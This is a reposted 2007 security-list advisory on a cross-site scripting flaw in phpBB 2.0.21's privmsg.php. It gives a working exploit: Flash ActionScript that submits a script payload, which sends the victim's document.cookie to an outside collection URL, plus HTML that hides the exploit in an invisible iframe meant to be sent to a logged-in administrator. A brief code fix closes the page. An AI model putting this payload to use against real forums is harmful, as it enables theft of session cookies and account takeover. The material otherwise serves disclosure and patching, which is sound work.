Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Jshop Server 1.3

  uniForum <= v4 (wbsearch.
aspx) Remote SQL Injection Vulnerability

  MOTIONBORG Web Real Estate <= v2.1 Remote SQL Injection Vulnerability

  shop Server 1.3 (fieldValidation.
php) Remote File Include Vulnerability

From:info_(at)_burnhead.it <info_(at)_burnhead.it>
Date:11.01.2007
Subject:phpBB (privmsg.php) XSS Exploit

phpBB (privmsg.php) XSS Exploit

By: Demential
Web: http://headburn.altervista.org
E-mail: info@burnhead.it
PhpBB website: http://phpbb.com

Exploit tested on phpBB 2.0.21

Secunia.com said:

Input passed to the form field "Message body" in privmsg.php
is not properly sanitised before it is returned to the user
when sending messages to a non-existent user.
This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

The Exploit:

Create a Shockwave Flash file with this code:

var username:String = "user_that_doesnt_exist";
var subject:String = "Xss Exploitation";
var message:String = "</textarea><script>document.location= 'http://site.com/cookie.php?c=' + document.cookie </script>";
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";
getURL("http://victim.com/phpBB2/privmsg.php", "_self", "POST");

Put it into a web page:

<html>
<head>
<title>Put a title here</title>
</head>
<body>
<p>Put some text here<p>
<iframe src="http://yoursite.com/exploit.swf" frameborder="0" height="0" width="0"></iframe>
</body>
</html>

And send it to the admin (or a normal user)
users must be logged-in.

Fixing:

open phpBB2/privmsg.php
find:

                       if (!($to_userdata = $db->sql_fetchrow($result)))
                       {
                               $error = TRUE;
                               $error_msg = $lang['No_such_user'];

replace with:


                       if (!($to_userdata = $db->sql_fetchrow($result)))
                       {
                               $error = TRUE;
                               echo "Sorry, but no such user exists.";
                               exit;

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server